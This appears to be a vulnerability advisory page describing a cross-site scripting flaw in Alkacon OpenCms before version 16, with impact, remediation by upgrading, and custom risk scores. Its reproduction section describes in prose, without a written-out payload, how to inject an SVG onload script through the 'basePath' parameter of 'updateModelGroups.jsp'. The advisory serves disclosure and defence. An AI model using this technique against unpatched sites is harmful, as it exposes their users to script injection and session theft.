Volerion logoVolerion
Volerion logoVolerion

Alkacon OpenCms Cross-Site Scripting Vulnerability

Vulnerability

A cross-site scripting (XSS) vulnerability has been identified in Alkacon OpenCms versions prior to 16. The issue arises in the 'updateModelGroups.jsp' page, where user input is not properly sanitized, allowing for the injection of malicious scripts that could be executed in the context of the user's browser.

Impact

Exploitation of this vulnerability allows for cross-site scripting, where an attacker can inject malicious scripts that are executed in the context of the user's browser.

Reproduction

To reproduce this vulnerability, send a GET request to the 'updateModelGroups.jsp' page within the OpenCms application. Include a 'basePath' parameter with a value that contains a crafted script, such as an SVG image with an 'onload' event. The injected script will be executed when the response is loaded in the browser.

Remediation

Users can update to OpenCms version 16 or later, where this vulnerability has been patched.

Added: May 8, 2026, 5:22 AM
Updated: May 8, 2026, 5:22 AM

Vulnerability Rating

Custom Algorithm
spread
3.4
impact
1.7
exploitability
7.7
remediation
7.7
relevance
7.8
threat
6.4
urgency
2.9
incentive
0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.